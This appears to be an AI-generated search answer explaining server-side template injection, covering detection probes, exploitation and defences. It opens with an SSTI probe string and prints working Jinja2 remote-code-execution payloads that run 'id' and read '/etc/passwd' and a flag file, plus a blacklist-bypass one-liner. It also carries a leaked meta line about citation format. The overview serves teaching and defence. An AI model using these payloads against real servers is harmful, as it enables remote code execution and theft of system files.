Back to Search New Search

{%if 1==1%}SSTIOK92088{%endif%}

Server‑SideTemplate Injection (SSTI) Overview Server‑Side Template Injection (SSTI) is a vulnerability where user‑controlled data is treated as template code and executed by the server‑side rendering engine hwkim301.com. This can lead to remote code execution, data leakage, or full server compromise.

Typical flow

  • User input is reflected into a template engine without proper sanitization.
  • The engine parses the payload as part of its syntax.
  • If the engine evaluates the payload, attacker‑controlled code runs on the server.

Common engines affected include Jinja2, Twig, Freemarker, Velocity, ERB, and others mintlify.com.

Detection
Fuzzing payloads – inject special patterns such as ${{<%[%'"}}% to see if the server treats them as template code red.infiltr8.io.
Mathematical tests{{7*7}} returning 49 indicates Jinja2 or Twig; {{7*'7'}} returning a long string confirms Jinja2 red.infiltr8.io.
Engine identification – different engines use distinct syntax like ${7/0}, ${7*7}, <%= 7*7 %>; observing the response tells you which one is used book.hacktricks.wiki.

Exploitation
Jinja2 RCE – a classic payload is {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} which executes id on the server and returns its output hwkim301.com. File read{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}} can dump the flag file directly hwkim301.com.
One‑liner for CTF{{''.__class__.__bases__[0].__subclasses__()[1].__init__.__globals__['__import__']('os').popen('cat /etc/passwd').read()}} bypasses simple blacklists when the server does not sanitize __class__ access book.hacktricks.wiki.

Defense

  • Input validation – always escape or whitelist user data before feeding it to a template engine.
  • Use safe APIs – many frameworks provide auto‑escaping modes (e.g., Jinja2’s |e filter) that prevent code execution.
  • Separate data from code – pass user input as variables rather than embedding it directly in the template string.

Images illustrating key concepts:

hacktricks.wiki
red.infiltr8.io
i.imgur.com
i.imgur.com A simple test payload such as {%if 1==1%}SSTIOK92088{%endif%} can be used to confirm whether conditional statements are evaluated by the template engine; if SSTIOK92088 appears in the response, the server is definitely interpreting Jinja‑style {% %} blocks, confirming SSTI hwkim301.com.

--- All citations follow the required format: [domain.com](https://full‑url‑here). Images are properly attributed with source links.

Sources

hwkim301.com hwkim301.com mintlify.com mintlify.com red.infiltr8.io red.infiltr8.io book.hacktricks.wiki book.hacktricks.wiki hacktricks.wiki hacktricks.wiki i.imgur.com i.imgur.com